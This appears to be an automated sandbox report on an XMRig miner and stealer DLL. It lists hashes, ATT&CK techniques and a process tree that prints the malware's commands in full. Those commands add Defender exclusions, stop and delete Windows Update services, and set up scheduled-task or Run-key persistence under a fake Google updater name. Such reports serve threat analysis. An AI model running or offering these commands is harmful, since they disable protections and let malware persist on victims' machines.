xmrig | fc33ed2f28a10b4b3cb775f7e699295f604d28bf3bf2cb2bc9185d002f89f91c

Analysis

max time kernel
149s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
08/09/2022, 23:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mamamiya137_ru_.bin.dll
Size

2.7MB
MD5

36c48ba4f231388a5f08fae2df0cec58
SHA1

3ba1d0aac10a41519610cf9166ab39b4c092d431
SHA256

fc33ed2f28a10b4b3cb775f7e699295f604d28bf3bf2cb2bc9185d002f89f91c
SHA512

4aa0e73f4eebfeb6cdeaf7cb0d050355185d3b8d91c044a911f895ec614ff0cb8b6d8e89ce3ea73052a4b55444ef1c7f72eaeabf2946a6bee8383ad03d93d4ee
SSDEEP

49152:Jzl1rpbUrqvv0v2rQVt8nqwI7lOOYc92ek:P1Kqvv07noI7lOOYcX

Score

10^/10

xmrig evasion miner spyware stealer upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 1 IoCs

miner

resource	yara_rule
behavioral2/memory/4604-190-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	xmrig

Blocklisted process makes network request 4 IoCs

flow	pid	Process
10	4784	rundll32.exe
17	4784	rundll32.exe
28	4784	rundll32.exe
32	4784	rundll32.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2084	oorvvqwwakjmxt.exe
4248	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4604-188-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx
behavioral2/memory/4604-190-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4248 set thread context of 4700	4248	updater.exe	133
PID 4248 set thread context of 4604	4248	updater.exe	139

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2336	sc.exe
3816	sc.exe
4676	sc.exe
744	sc.exe
2864	sc.exe
2812	sc.exe
1640	sc.exe
2076	sc.exe
4592	sc.exe
5076	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4784	rundll32.exe
4784	rundll32.exe
4744	powershell.exe
4744	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
2604	powershell.exe
2604	powershell.exe
2628	powershell.exe
2628	powershell.exe
1628	powershell.exe
1628	powershell.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe
4604	dwm.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
656	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4744	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeIncreaseQuotaPrivilege	4868	powershell.exe
Token: SeSecurityPrivilege	4868	powershell.exe
Token: SeTakeOwnershipPrivilege	4868	powershell.exe
Token: SeLoadDriverPrivilege	4868	powershell.exe
Token: SeSystemProfilePrivilege	4868	powershell.exe
Token: SeSystemtimePrivilege	4868	powershell.exe
Token: SeProfSingleProcessPrivilege	4868	powershell.exe
Token: SeIncBasePriorityPrivilege	4868	powershell.exe
Token: SeCreatePagefilePrivilege	4868	powershell.exe
Token: SeBackupPrivilege	4868	powershell.exe
Token: SeRestorePrivilege	4868	powershell.exe
Token: SeShutdownPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeSystemEnvironmentPrivilege	4868	powershell.exe
Token: SeRemoteShutdownPrivilege	4868	powershell.exe
Token: SeUndockPrivilege	4868	powershell.exe
Token: SeManageVolumePrivilege	4868	powershell.exe
Token: 33	4868	powershell.exe
Token: 34	4868	powershell.exe
Token: 35	4868	powershell.exe
Token: 36	4868	powershell.exe
Token: SeIncreaseQuotaPrivilege	4868	powershell.exe
Token: SeSecurityPrivilege	4868	powershell.exe
Token: SeTakeOwnershipPrivilege	4868	powershell.exe
Token: SeLoadDriverPrivilege	4868	powershell.exe
Token: SeSystemProfilePrivilege	4868	powershell.exe
Token: SeSystemtimePrivilege	4868	powershell.exe
Token: SeProfSingleProcessPrivilege	4868	powershell.exe
Token: SeIncBasePriorityPrivilege	4868	powershell.exe
Token: SeCreatePagefilePrivilege	4868	powershell.exe
Token: SeBackupPrivilege	4868	powershell.exe
Token: SeRestorePrivilege	4868	powershell.exe
Token: SeShutdownPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeSystemEnvironmentPrivilege	4868	powershell.exe
Token: SeRemoteShutdownPrivilege	4868	powershell.exe
Token: SeUndockPrivilege	4868	powershell.exe
Token: SeManageVolumePrivilege	4868	powershell.exe
Token: 33	4868	powershell.exe
Token: 34	4868	powershell.exe
Token: 35	4868	powershell.exe
Token: 36	4868	powershell.exe
Token: SeIncreaseQuotaPrivilege	4868	powershell.exe
Token: SeSecurityPrivilege	4868	powershell.exe
Token: SeTakeOwnershipPrivilege	4868	powershell.exe
Token: SeLoadDriverPrivilege	4868	powershell.exe
Token: SeSystemProfilePrivilege	4868	powershell.exe
Token: SeSystemtimePrivilege	4868	powershell.exe
Token: SeProfSingleProcessPrivilege	4868	powershell.exe
Token: SeIncBasePriorityPrivilege	4868	powershell.exe
Token: SeCreatePagefilePrivilege	4868	powershell.exe
Token: SeBackupPrivilege	4868	powershell.exe
Token: SeRestorePrivilege	4868	powershell.exe
Token: SeShutdownPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeSystemEnvironmentPrivilege	4868	powershell.exe
Token: SeRemoteShutdownPrivilege	4868	powershell.exe
Token: SeUndockPrivilege	4868	powershell.exe
Token: SeManageVolumePrivilege	4868	powershell.exe
Token: 33	4868	powershell.exe
Token: 34	4868	powershell.exe
Token: 35	4868	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1428 wrote to memory of 4784	1428	rundll32.exe	84
PID 1428 wrote to memory of 4784	1428	rundll32.exe	84
PID 1428 wrote to memory of 4784	1428	rundll32.exe	84
PID 4784 wrote to memory of 2084	4784	rundll32.exe	90
PID 4784 wrote to memory of 2084	4784	rundll32.exe	90
PID 2084 wrote to memory of 4744	2084	oorvvqwwakjmxt.exe	95
PID 2084 wrote to memory of 4744	2084	oorvvqwwakjmxt.exe	95
PID 2084 wrote to memory of 1904	2084	oorvvqwwakjmxt.exe	99
PID 2084 wrote to memory of 1904	2084	oorvvqwwakjmxt.exe	99
PID 2084 wrote to memory of 4868	2084	oorvvqwwakjmxt.exe	101
PID 2084 wrote to memory of 4868	2084	oorvvqwwakjmxt.exe	101
PID 1904 wrote to memory of 2864	1904	cmd.exe	103
PID 1904 wrote to memory of 2864	1904	cmd.exe	103
PID 1904 wrote to memory of 2812	1904	cmd.exe	104
PID 1904 wrote to memory of 2812	1904	cmd.exe	104
PID 1904 wrote to memory of 1640	1904	cmd.exe	105
PID 1904 wrote to memory of 1640	1904	cmd.exe	105
PID 1904 wrote to memory of 2336	1904	cmd.exe	106
PID 1904 wrote to memory of 2336	1904	cmd.exe	106
PID 1904 wrote to memory of 2076	1904	cmd.exe	107
PID 1904 wrote to memory of 2076	1904	cmd.exe	107
PID 1904 wrote to memory of 3976	1904	cmd.exe	108
PID 1904 wrote to memory of 3976	1904	cmd.exe	108
PID 1904 wrote to memory of 4056	1904	cmd.exe	109
PID 1904 wrote to memory of 4056	1904	cmd.exe	109
PID 1904 wrote to memory of 2456	1904	cmd.exe	110
PID 1904 wrote to memory of 2456	1904	cmd.exe	110
PID 1904 wrote to memory of 884	1904	cmd.exe	111
PID 1904 wrote to memory of 884	1904	cmd.exe	111
PID 1904 wrote to memory of 2584	1904	cmd.exe	112
PID 1904 wrote to memory of 2584	1904	cmd.exe	112
PID 2084 wrote to memory of 2604	2084	oorvvqwwakjmxt.exe	113
PID 2084 wrote to memory of 2604	2084	oorvvqwwakjmxt.exe	113
PID 2604 wrote to memory of 4236	2604	powershell.exe	115
PID 2604 wrote to memory of 4236	2604	powershell.exe	115
PID 4248 wrote to memory of 2628	4248	updater.exe	117
PID 4248 wrote to memory of 2628	4248	updater.exe	117
PID 4248 wrote to memory of 4232	4248	updater.exe	119
PID 4248 wrote to memory of 4232	4248	updater.exe	119
PID 4248 wrote to memory of 1628	4248	updater.exe	120
PID 4248 wrote to memory of 1628	4248	updater.exe	120
PID 4232 wrote to memory of 4592	4232	cmd.exe	123
PID 4232 wrote to memory of 4592	4232	cmd.exe	123
PID 4232 wrote to memory of 3816	4232	cmd.exe	124
PID 4232 wrote to memory of 3816	4232	cmd.exe	124
PID 4232 wrote to memory of 4676	4232	cmd.exe	125
PID 4232 wrote to memory of 4676	4232	cmd.exe	125
PID 4232 wrote to memory of 744	4232	cmd.exe	126
PID 4232 wrote to memory of 744	4232	cmd.exe	126
PID 4232 wrote to memory of 5076	4232	cmd.exe	127
PID 4232 wrote to memory of 5076	4232	cmd.exe	127
PID 4232 wrote to memory of 1924	4232	cmd.exe	128
PID 4232 wrote to memory of 1924	4232	cmd.exe	128
PID 4232 wrote to memory of 3732	4232	cmd.exe	129
PID 4232 wrote to memory of 3732	4232	cmd.exe	129
PID 4232 wrote to memory of 364	4232	cmd.exe	130
PID 4232 wrote to memory of 364	4232	cmd.exe	130
PID 4232 wrote to memory of 848	4232	cmd.exe	131
PID 4232 wrote to memory of 848	4232	cmd.exe	131
PID 4232 wrote to memory of 4404	4232	cmd.exe	132
PID 4232 wrote to memory of 4404	4232	cmd.exe	132
PID 4248 wrote to memory of 4700	4248	updater.exe	133
PID 4248 wrote to memory of 4700	4248	updater.exe	133
PID 4248 wrote to memory of 4700	4248	updater.exe	133

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\mamamiya137_ru_.bin.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1428
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\mamamiya137_ru_.bin.dll,#1
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Users\Admin\AppData\Local\Temp\oorvvqwwakjmxt.exe
    "C:\Users\Admin\AppData\Local\Temp\oorvvqwwakjmxt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4744
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1904
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2864
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2812
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1640
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:2336
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2076
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:3976
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:4056
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:2456
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:884
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:2584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#ddxyuoslq#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2604
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
        5⤵
        
        PID:4236

C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2628
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4232
- - C:\Windows\system32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4592
- - C:\Windows\system32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:3816
- - C:\Windows\system32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4676
- - C:\Windows\system32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:744
- - C:\Windows\system32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5076
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3732
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:364
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:848
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell <#zgvxtubz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1628
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe jmcfgycslfymn
  2⤵
  PID:4700
- - C:\Windows\system32\cmd.exe
    cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
    3⤵
    PID:392
- C:\Windows\system32\cmd.exe
  cmd /c mkdir "C:\Users\Admin\AppData\Roaming\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "C:\Users\Admin\AppData\Roaming\Google\Libs\g.log"
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name
    3⤵
    PID:3136
- C:\Windows\system32\dwm.exe
  C:\Windows\system32\dwm.exe rhsgxdrgcnvokcze 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUGu8K1XCwbSh+ypLRcuGVjKHCqkQEbMjFPp2wEHUk/2YPEa7u8eDtaLNsvMtmfnW7pfZpWBLC28ol0YuaRyoAomoKg0M+MybStmWANwpbdJc3A2uC6nbgxCBAPoLOO1OuubEuAZTBCdX/xrrcvKnB4H9LwgUyVl9z4LaBunuWLn9L+984DlEL8pLkHAhoqzbgnzq2Q8UulW3Pe1gu+jesqTUbmj//6+fiMhPgKixPwrGz+CELGutufbQREgiXW/NQvg1coXmscuZ6yQ7RnXXKH4GsnmWjjAo51w5WaTYtMM4tqi5n6yulrtZsexR2Y9ab2lSIri/mxz2RWaQYEWaHr+wsVwDrDaUmzhazyLU8bE+gbFvD2hyocZFBvGnOyRz2iSzhnZ7rBWrLxt5q36TsGIHyIiMTkfwiniXKP/hUp/fAVcT9dBT6tKiKkFF/MseV
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a084085c1e171dbcbc9b3ca36ca51413

SHA1
32c74da1846ed93dc1ed808e3f9d8b6ea9c6ef82

SHA256
5c63127c8c26c21cb39edbafcaa7c4cc18be20fa8bcc7e46968e67b80a94bc64

SHA512
3e51800a8069e14afcd30486a1291b87255d87dd0cd2d4b583f02b440886dbddb7f590ae06a12503df079eccad4ef353bb13920ec0b3ded5ee936d43900bd455

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e1998d7d07a2cde3ba7241ee388b36c2

SHA1
c229adffd103824362426c4e3103b7b415426990

SHA256
effdbc6b49698dd85890627cdc91b8594c7ebb0f43cead36843f949a9fa4358b

SHA512
5f0a2b70935ef9d3ef55f32904588d584d1e0fe8d9e0bba1b763304a1b71b2d99c5bf6cfe8327b4505a26cc3f8c72c1946ebc702c998499cce21fa7a84315720

Download Submit
C:\Users\Admin\AppData\Local\Temp\oorvvqwwakjmxt.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Local\Temp\oorvvqwwakjmxt.exe

Filesize
4.0MB

MD5
9e2dccb45bffdc436741e88b0125cfba

SHA1
07ea0a692175a9a3c946263cb77fb8a328c8ebc1

SHA256
c555bd99e5d32975594127b66602319349f1db161287b533915d92b4eb8420d3

SHA512
457c90690d69830af121bb7c2f04e101ae59f79eb2f47f3489e65774cbabdc0537608c767e472e23740aea10d733c30441fe331538b0eb59734d3588dade492a

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe

Filesize
4.0MB

MD5
d8b1e808045510a544b3bea75a4926e0

SHA1
a54f9cab1b1ba331d713e320195a51eed5387f7e

SHA256
1d861744d652e6b53ba7a8e7b8d1d3d137655433f1c80c097b64f12081d49bf5

SHA512
f4b8069157b3864ff5cc5fe176b162223ecb9a0881c77efd7e45e4024f0d685bf627fffddc2c811dbfd8bdf6b0ef03f193a9db6c648fa06b7af595e43d70e3e9

Download Submit
C:\Users\Admin\AppData\Roaming\Google\Libs\g.log

Filesize
142B

MD5
543c22e022ad2fe07e2fff6782b5842f

SHA1
b0ce4f26371897a0f1a3460c14520adf3d665a69

SHA256
62c97f684183ebec6c67e3cd5cb96e23435d07e0ef9687196b58a2da6d5de8a3

SHA512
f33db332015bb84e8c31dd78af7511b761e8bf7946cd046b7190df1246f7ae646e5edaa1f47dae3f3137a80607697ec08b8d198438886e8a3c16f7e9dee83640

Download Submit
memory/1628-178-0x00007FF99BCC0000-0x00007FF99C781000-memory.dmp

Filesize
10.8MB

Download
memory/1628-179-0x00007FF99BCC0000-0x00007FF99C781000-memory.dmp

Filesize
10.8MB

Download
memory/2604-158-0x00007FF99BCC0000-0x00007FF99C781000-memory.dmp

Filesize
10.8MB

Download
memory/2604-161-0x00007FF99BCC0000-0x00007FF99C781000-memory.dmp

Filesize
10.8MB

Download
memory/2628-164-0x00007FF99BCC0000-0x00007FF99C781000-memory.dmp

Filesize
10.8MB

Download
memory/4604-194-0x0000024AF4E50000-0x0000024AF4E70000-memory.dmp

Filesize
128KB

Download
memory/4604-195-0x0000024AF4E30000-0x0000024AF4E50000-memory.dmp

Filesize
128KB

Download
memory/4604-196-0x0000024AF4E50000-0x0000024AF4E70000-memory.dmp

Filesize
128KB

Download
memory/4604-193-0x0000024AF4E30000-0x0000024AF4E50000-memory.dmp

Filesize
128KB

Download
memory/4604-192-0x0000024AF4E30000-0x0000024AF4E50000-memory.dmp

Filesize
128KB

Download
memory/4604-188-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/4604-191-0x0000024AF4E30000-0x0000024AF4E50000-memory.dmp

Filesize
128KB

Download
memory/4604-190-0x00007FF678CF0000-0x00007FF6794E4000-memory.dmp

Filesize
8.0MB

Download
memory/4604-189-0x0000024AF4DD0000-0x0000024AF4E10000-memory.dmp

Filesize
256KB

Download
memory/4604-187-0x0000024AF4C70000-0x0000024AF4C90000-memory.dmp

Filesize
128KB

Download
memory/4744-137-0x00007FF99BBA0000-0x00007FF99C661000-memory.dmp

Filesize
10.8MB

Download
memory/4744-136-0x000002A711810000-0x000002A711832000-memory.dmp

Filesize
136KB

Download
memory/4744-138-0x00007FF99BBA0000-0x00007FF99C661000-memory.dmp

Filesize
10.8MB

Download
memory/4868-148-0x00007FF99BBA0000-0x00007FF99C661000-memory.dmp

Filesize
10.8MB

Download
memory/4868-154-0x00007FF99BBA0000-0x00007FF99C661000-memory.dmp

Filesize
10.8MB

Download